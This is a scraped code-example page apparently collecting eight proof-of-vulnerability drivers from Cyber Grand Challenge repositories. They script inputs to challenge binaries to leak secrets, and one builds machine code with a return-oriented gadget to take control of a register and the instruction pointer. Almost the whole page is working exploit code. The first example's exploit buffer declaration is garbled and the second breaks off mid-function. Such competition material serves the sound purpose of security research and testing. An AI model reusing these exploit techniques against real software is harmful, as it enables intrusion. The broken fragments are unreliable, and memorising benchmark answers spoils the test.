コード例 #1
ファイル: pov.c プロジェクト: CyberGrandChallenge/samples
/*
 * Type-2 proof-of-vulnerability driver.  Talks to the challenge binary over
 * STDOUT/STDIN: every command is a 2-byte id followed by one or more payloads,
 * each preceded by a 2-byte length.  transmit_all() sends the raw in-memory
 * bytes of each variable, so the wire format follows host byte order.  At the
 * end, 4 bytes read back from STDIN are handed to type2_submit().
 */
int main()
{
    // NOTE(review): this line is garbled in this copy — the declaration of the
    // `exploit` byte array referenced by the sizeof(exploit) sends below was
    // lost.  As written it does not compile, and the original bytes cannot be
    // recovered from this page.
    unsigned char exploitx0c\"8N";
    char admin_name[] = {12, 34, 56, 78 };  // 4-byte name used for the second user
    type2_vals t2;
    type2_negotiate(&t2);                   // negotiated values are not read afterwards
    int secret = 0;                         // filled from STDIN just before submission

    unsigned char buf[200];                 // scratch buffer, only used to drain a reply
    unsigned short msg_length = 0;          // length prefix, reused for every payload
    unsigned short register_user_req = 11382;
    char user_name[] = { 11, 22, 33, 44 };  // 4-byte name of the first user

    //Register first user (this user will have name overwritten)
    transmit_all(STDOUT, &register_user_req, sizeof(register_user_req));
    msg_length = sizeof(user_name);
    transmit_all(STDOUT, &msg_length, sizeof(msg_length));
    transmit_all(STDOUT, user_name, sizeof(user_name));

    //Logout user
    unsigned short logout_req = 8719;
    transmit_all(STDOUT, &logout_req, sizeof(logout_req));

    unsigned short login_req = 8711;
    //Using the login (vulnerable) command overwrite user name of first user
    // login carries two length-prefixed fields: exploit, then admin_name
    transmit_all(STDOUT, &login_req, sizeof(login_req));
    msg_length = sizeof(exploit) - 1;       // -1 presumably drops a string literal's NUL
    transmit_all(STDOUT, &msg_length, sizeof(msg_length));
    transmit_all(STDOUT, exploit, sizeof(exploit) - 1);
    msg_length = sizeof(admin_name);
    transmit_all(STDOUT, &msg_length, sizeof(msg_length));
    transmit_all(STDOUT, admin_name, sizeof(admin_name));

    //Now login as the administrator
    // same two-field login sequence; admin_name is sent for both fields
    transmit_all(STDOUT, &login_req, sizeof(login_req));
    msg_length = sizeof(admin_name);
    transmit_all(STDOUT, &msg_length, sizeof(msg_length));
    transmit_all(STDOUT, admin_name, sizeof(admin_name));
    msg_length = sizeof(admin_name);
    transmit_all(STDOUT, &msg_length, sizeof(msg_length));
    transmit_all(STDOUT, admin_name, sizeof(admin_name));

    // request a remote token for page 100 (no length prefix on this command)
    unsigned short remote_token_req = 7777;
    unsigned short page_idx = 100;
    transmit_all(STDOUT, &remote_token_req, sizeof(remote_token_req));
    transmit_all(STDOUT, &page_idx, sizeof(page_idx));

    unsigned short exit_server = 9999;
    transmit_all(STDOUT, &exit_server, sizeof(exit_server));
    length_read(STDIN, buf, 24);            // first 24 reply bytes are discarded
    length_read(STDIN, (unsigned char *)(&secret), sizeof(secret));  // next sizeof(int) bytes are the answer
    type2_submit((unsigned char *)(&secret), sizeof(secret));
    return 0;
}
コード例 #2
ファイル: pov1.c プロジェクト: trailofbits/cb-multios
int main(void) {
    type2_negotiate(&t2_vals);
    protocol_consume_str();

    transmit(STDERR, "1", 1, NULL);
    protocol_send_str("FIND ord('x', 0 - 29881 * 65536 + 74513) FROM x");
    transmit(STDERR, "\n", 1, NULL);
    protocol_with_recv_string(^(uint16 len, char* str) {
        unsigned char* ustr = (unsigned char*)str;
        t2buf[0] = atoi(ustr, len);
    });
コード例 #3
ファイル: pov.c プロジェクト: trailofbits/cb-multios
/*
 * Type-2 PoV for a screen-oriented text game.  Scripts a fixed sequence of
 * commands over STDOUT, re-reads the rendered screen after each one via
 * ReadScreen(), parses a decimal number out of the second-to-last screen
 * line, XOR-decodes its four bytes with a fixed key and submits them.
 * STDERR writes are progress traces only.  main() has no return statement;
 * under C99+ that is an implicit `return 0`.
 */
int main()
{
    type2_vals t2v;
    unsigned char* ScreenBuf[MAX_LINES];    // one pointer per screen line, filled by ReadScreen()
    unsigned LineCnt;                       // number of lines the last ReadScreen() produced

#ifndef DEBUG
    type2_negotiate(&t2v);
#else
    (void)t2v;                              // keep the variable "used" in DEBUG builds
#endif

    transmit_all(STDOUT, "l23k", 4);        // 4 raw bytes, no newline

    send_string(STDERR, "GOING\n");
    LineCnt = ReadScreen(ScreenBuf);
    // 64 rounds of the "0" command, refreshing the screen after each
    for (unsigned Index = 0; Index < 64; ++Index)
    {
        send_string(STDERR, "LOOP\n");
        send_string(STDOUT, "0\n");
        LineCnt = ReadScreen(ScreenBuf);
    }

    send_string(STDOUT, "shuf\n");
    LineCnt = ReadScreen(ScreenBuf);
    send_string(STDOUT, "4986\n");
    LineCnt = ReadScreen(ScreenBuf);
    send_string(STDOUT, "4\n");
    LineCnt = ReadScreen(ScreenBuf);
    send_string(STDOUT, "dupr\n");
    LineCnt = ReadScreen(ScreenBuf);


    // Second-to-last line; skip past ": " to the number.
    // NOTE(review): neither LineCnt >= 2 nor the strchr() result is checked,
    // so an unexpected screen would index out of bounds or advance a NULL.
    char* s = (char *)ScreenBuf[LineCnt - 2];
    s = strchr(s, ':');
    s += 2;

    int m = strtol(s, NULL, 10);            // long narrowed to int; endptr/errno not checked
    unsigned char secret[4];
    cgc_memcpy(secret, (void *)&m, 4);      // raw bytes of m — assumes sizeof(int) == 4

    // per-byte XOR with the fixed key 14 15 16 17
    secret[0] ^= 0x14;
    secret[1] ^= 0x15;
    secret[2] ^= 0x16;
    secret[3] ^= 0x17;

    send_string(STDERR, (char *)s);         // trace: the text that was parsed
    send_string(STDERR, "----->\n");
    type2_submit((unsigned char *)secret, 4);
    send_string(STDOUT, "quit\n");
}
コード例 #4
ファイル: pov.c プロジェクト: trailofbits/cb-multios
/*
 * Type-2 PoV: after negotiation, reads and discards 10 bytes from the
 * challenge binary, sends one fixed command line followed by "quit", and
 * submits the 4 bytes that come back.
 */
int main(void) {
  // negotiate
  type2_vals t2vals;
  type2_negotiate(&t2vals);                 // negotiated values are not used below (see commented call)
  
  // perform POV
  char input[11];
  ReceiveFromCB(input, 10);                 // 10 bytes read and ignored
  // 54 characters + NUL fill bytes[55] exactly; the decimal field starts at offset 42
  char bytes[55] = "ish hostname +p password +l username dump 1128775680 \n";
  //print_integer(bytes + 42, t2vals.region_addr);
  // (the disabled call above would have replaced that decimal field with t2vals.region_addr)
  SendToCB(bytes, cgc_strlen(bytes));
  unsigned int i = 0xffffffff;              // sentinel; overwritten by the 4-byte reply below
  SendToCB("quit\n", 5);
  ReceiveFromCB((char *)&i, 4);
  type2_submit((unsigned char *)&i, 4);
  return 0;
}
コード例 #5
ファイル: pov.c プロジェクト: trailofbits/cb-multios
/*
 * Type-2 PoV: builds a 140-byte request in buf from a fixed template (an
 * "HDR" record followed by "ALBM" and "TITL" records), randomizes two spans
 * inside each of the ALBM and TITL records, rewrites bytes the target is
 * assumed to reject, sends the request, and then picks the 4-byte answer out
 * of the "Album: ..." text the binary echoes back.
 */
int main()
{
    type2_vals t2;
    unsigned char buf[200];                 // 140 bytes of request; later reused for replies
    int i;
    size_t bytes;                           // count produced by random(); never checked

    // Template layout: bytes 0..10 = "\x00\xff" "HDR" + 6 bytes; ALBM record at 11,
    // TITL record at 11 + 0x40; trailing 0x7f at offset 139.
    cgc_memcpy(buf, "\x00\xff""HDR\x05\x00\x00\x00\x01\x00"
                "ALBM\x00\x00\x00\x38\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b""AAAAAAAAAAAA\x20\xc0\x47\x43""CCCCAAAAAAAAAAAA"
                "TITL\x00\x00\x00\x38\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b""AAAAAAAAAAAA\x30\xc0\x47\x43""CCCCAAAAAAAAAAAA\x7f", 140);

    // random() here is the CGC libc form (dst, count, &written), not stdlib random().
    // In each record the 12-byte "A" run and the 16-byte "CCCCAAAAAAAAAAAA" run are
    // replaced; the 4 bytes between them (\x20/\x30 \xc0 \x47 \x43) stay fixed.
    random(buf + 11 + 8 + 24, 12, &bytes);
    random(buf + 11 + 8 + 24 + 16, 16, &bytes);
    random(buf + 11 + 0x40 + 8 + 24, 12, &bytes);
    random(buf + 11 + 0x40 + 8 + 24 + 16, 16, &bytes);

    // The loop stops at 138, so the template's trailing 0x7f at offset 139 is
    // never rewritten — presumably intentional, since 0x7f is otherwise replaced.
    for (i = 0; i < 139; i++)
    {
        // make sure we didn't introduce any bad chars
        // bytes < 0x10 inside the two randomized regions (11+0x20..11+0x40 and
        // 11+0x60..11+0x80) are XORed with 0x55 to move them out of that range
        if (i >= 11 + 0x20 && i < 11 + 0x40 && buf[i] < 0x10) buf[i] ^= 0x55;
        if (i >= 11 + 0x60 && i < 11 + 0x80 && buf[i] < 0x10) buf[i] ^= 0x55;
        if (buf[i] == 0x7f) buf[i] = 0x3f;
        if (buf[i] == 0x7e) buf[i] = 0x3e;
    }

    type2_negotiate(&t2);
    transmit_all(STDOUT, buf, 140);
    length_read(STDIN, buf, 0x58);          // first 0x58 reply bytes are discarded
    length_read(STDIN, buf, 16);
    // buf contains: "Album: ?????????"
    // as long as buf does not contain "Arti", we have won
    // (for i = 13..15 memcmp also reads buf[16..18], left over from the 0x58-byte read)
    for (i = 7; i < 16; i++)
        if (memcmp(&buf[i], "Arti", 4) == 0)
            break;
    if (i == 16)
    {
        type2_submit(buf + 7, 4);           // the 4 bytes right after "Album: "
        return 0;
    }

    // we found "Arti", so look some more
    length_read(STDIN, buf, 8);
    type2_submit(buf + 4, 4);
    return 0;
}
コード例 #6
ファイル: main.c プロジェクト: trailofbits/cb-multios
/*
 * Type-2 PoV for a menu-driven game.  Registers a player, re-registers it
 * under a 24-character name through menu path 4 / 1, plays the hi-lo game,
 * then exits through menu path 4 / 2.  type2_submit() is not called here;
 * presumably play_hi_lo() (defined elsewhere) reads and submits the value.
 */
int main()
{
    type2_vals t2;
    type2_negotiate(&t2);                   // negotiated values are not read here

    char *register_player = "1\nPovPlayer, 1\n";                      // menu 1: name, count
    char *reregister_player = "4\n1\n123456789012345678901234, 1\n";  // menu 4 -> 1: 24-char name
    char *cgc_exit = "4\n2\n";                                        // menu 4 -> 2: quit

    transmit_all(STDOUT, register_player, cgc_strlen(register_player));
    read_until_game_prompt();               // sync on the game prompt before the next command
    transmit_all(STDOUT, reregister_player, cgc_strlen(reregister_player));

    play_hi_lo(0);

    transmit_all(STDOUT, cgc_exit, cgc_strlen(cgc_exit));
    return 0;
}
コード例 #7
ファイル: pov.c プロジェクト: chubbymaggie/cb-multios
/*
 * Type-1 PoV.  Negotiates an instruction-pointer / register value pair,
 * lays out a 79-byte request in buf (a 40-byte header of 32-bit fields
 * followed by a 39-byte block), patches the two negotiated values into that
 * block and sends it, then reads a 4-byte reply it does not use.
 * The #if 0 section is an unused type-2 skeleton and is not compiled.
 */
int main(int cgc_argc, char *cgc_argv[])   // argc/argv are unused
{
    unsigned char buf[128];
    type1_vals t1;
    // presumably (ipmask, regmask, regnum, out): low 24 bits of each value are negotiated
    cgc_type1_negotiate(0x00ffffff, 0x00ffffff, 5, &t1);
    t1.ipval |= 0x91000000;                 // fix the top byte of both values
    t1.regval |= 0x91000000;

#if 0
    unsigned char data[4];
    type2_vals t2;
    type2_negotiate(&t2);
    /* ... */
    type2_submit(data, 4);
#endif

    // NOTE(review): storing through (unsigned int *) into an unsigned char
    // array assumes 4-byte alignment and breaks strict aliasing; a memcpy()
    // per field would be the portable form.
    // query
    *(unsigned int *)&buf[0] = 36 + 39;     // 75: size of everything after this field
    *(unsigned int *)&buf[4] = 0x367bae4d;

    // exe
    *(unsigned int *)&buf[8] = 0x4E269472;
    *(unsigned int *)&buf[12] = 0x2000;
    *(unsigned int *)&buf[16] = 0x2000;
    *(unsigned int *)&buf[20] = 39;         // length of the block copied below
    *(unsigned int *)&buf[24] = 0x2020;
    *(unsigned int *)&buf[28] = 0;
    *(unsigned int *)&buf[32] = 0x2020;
    *(unsigned int *)&buf[36] = 0;

    // gadget (0x90000101): pop ebx, pop ebp, ret
    // 39 bytes at offsets 40..78; the 0x42424242 and 0x41414141 runs are placeholders
    cgc_memcpy(&buf[40], "\x81\xec\x94\x80\x01\x00\xc7\x04\x24\x42\x42\x42\x42\x4c\x4c\x4c\x4c\xc7\x04\x24\x41\x41\x41\x41\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\xc7\x04\x24\x05\x01\x00\x90", 39);

    // set ip and ebp
    // offsets 49..52 and 60..63 are the two placeholder runs inside the block above
    *(unsigned int *)&buf[49] = t1.ipval;
    *(unsigned int *)&buf[60] = t1.regval;

    cgc_transmit_all(STDOUT, buf, 40 + 39); // 79 bytes: header + block
    cgc_length_read(STDIN, buf, 4);         // reply is read into buf and ignored
    return 0;
}
コード例 #8
ファイル: pov.c プロジェクト: trailofbits/cb-multios
/*
 * Type-2 PoV for a subscription/"blub" message service.  Registers as
 * "charlie", subscribes to itself, posts a record that carries a raw int,
 * reads an address back out of the reply, turns it into an index relative
 * to a hard-coded base, sends a command built around that index, then reads
 * 4 bytes and submits them.  EOT_S is a string-literal macro (defined
 * elsewhere) that terminates each record; the "" juxtaposition concatenates
 * it onto the preceding literal.
 */
int main(void)
{

#ifndef DEBUG
    xlat_seed("9an538n9av3;5");             // fixed seed; purpose defined elsewhere
#endif

    char buf[1024];                         // reply buffer, later reused as a text buffer
    int secrets = 0x4347c010;               // sent as 4 raw bytes inside the record below
    const char* reg = "charlie" EOT_S;
    const char* sub_self = "s" EOT_S "charlie" EOT_S;
    const char* start_blub = "b" EOT_S;
    const char* read_blubs = "r" EOT_S;

    length_read(0, (unsigned char*)buf, 0x4);   // 4 bytes read and ignored
#ifndef TESTING
    unsigned char data[4];                  // receives the 4 bytes to submit
    type2_vals t2;
    type2_negotiate(&t2);                   // negotiated values are not read afterwards
#endif

    send_string(1, reg);
    length_read(0, (unsigned char*)buf, 0x4);   // 4-byte reply, ignored
    send_string(1, sub_self);
    send_string(1, start_blub);
    send_string(1, "adf");
    transmit_all(1, &secrets, sizeof(secrets));  // raw int bytes in the middle of the record
    send_string(1, EOT_S);
    send_string(1, read_blubs);

    length_read(0, (unsigned char*)buf, 0x30);  // 0x30 bytes discarded
    length_read(0, (unsigned char*)buf, 0x4);   // 4 bytes kept: interpreted as an address below
#ifndef DEBUG
    size_t client_0_data = 0xb7e004f8;      // hard-coded base for the non-DEBUG build
#else
    size_t client_0_data = 0xb7e000b8;      // hard-coded base for the DEBUG build
#endif
    // NOTE(review): only 4 bytes were read, so this reinterpretation assumes a
    // 4-byte size_t (on a 64-bit build it also reads 4 stale bytes) and
    // aliases a char array as size_t; memcpy into a uint32_t would be portable.
    size_t secret_addr = (*(size_t*)buf) + 44;
    int diff = secret_addr - client_0_data; // byte distance, then divided into 4-byte slots
    diff /= 4;
    int idx = (2 << 29) - diff;             // 2 << 29 == 0x40000000

    // formats -idx as a base-10 string into buf (assumed from the arguments — confirm;
    // also note identifiers starting with '_' at file scope are reserved in C)
    _convert_signed(buf, -idx, 10, 0);

    // NOTE(review): tosend is never initialized, so the first strcat() scans
    // indeterminate bytes for a terminator — undefined behaviour.  The buffer
    // should be zero-initialised (or tosend[0] = '\0') before appending.
    char tosend[1024];
    strcat(tosend, "y");
    strcat(tosend, EOT_S);
    strcat(tosend, "charlie");
    strcat(tosend, EOT_S);
    strcat(tosend, buf);
    strcat(tosend, EOT_S);
    send_string(1, tosend);
    send_string(1, read_blubs);
    const char* cgc_exit = "e" EOT_S;
    send_string(1, cgc_exit);

#ifndef TESTING
    length_read(0, (unsigned char*)buf, 336);   // 336 reply bytes discarded
    length_read(0, data, 4);                    // the 4 bytes that follow are the answer
    type2_submit(data, 4);
#endif

    return 0;
}